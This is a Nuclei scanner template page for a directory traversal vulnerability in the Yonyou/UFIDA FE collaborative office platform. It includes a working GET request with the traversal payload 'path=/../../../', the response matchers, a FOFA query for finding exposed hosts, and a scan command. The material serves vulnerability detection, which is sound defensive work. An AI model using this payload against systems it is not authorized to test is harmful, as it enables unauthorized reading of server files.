FE collaborative Office templateOfTaohong_manager.jsp - Path Traversal
ID: yonyou-fe-directory-traversal
Severity: medium
Author: SleepingBag945
Tags: yonyou,fe,lfi
Description
Section titled “Description”There is a directory traversal vulnerability in the templateOfTaohong_manager.jsp file of UFIDA FE collaborative office platform. Through the vulnerability, attackers can obtain directory files and other information, leading to further attacks.
YAML Source
Section titled “YAML Source”id: yonyou-fe-directory-traversal
info: name: FE collaborative Office templateOfTaohong_manager.jsp - Path Traversal author: SleepingBag945 severity: medium description: | There is a directory traversal vulnerability in the templateOfTaohong_manager.jsp file of UFIDA FE collaborative office platform. Through the vulnerability, attackers can obtain directory files and other information, leading to further attacks. reference: - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20FE%E5%8D%8F%E4%BD%9C%E5%8A%9E%E5%85%AC%E5%B9%B3%E5%8F%B0%20templateOfTaohong_manager.jsp%20%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86%E6%BC%8F%E6%B4%9E.md metadata: verified: true max-request: 1 fofa-query: FE协作 tags: yonyou,fe,lfi
http: - method: GET path: - "{{BaseURL}}/system/mediafile/templateOfTaohong_manager.jsp?path=/../../../"
matchers-condition: and matchers: - type: word words: - "window.location=\"templateOfTaohong_manager.jsp?path=\"" - "var next=window.confirm(\"确定删除文件吗?\");" condition: and
- type: status status: - 200# digest: 490a0046304402202c7f758d164b426166674808cdff90ca7c63c3eb0ab16b1ebee8b8f31f1ce972022063d61ce08fdbbd9409c2d8086bc2b2d7c1b94c599312c5c7ae24fc303c21a91b:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/vulnerabilities/yonyou/yonyou-fe-directory-traversal.yaml"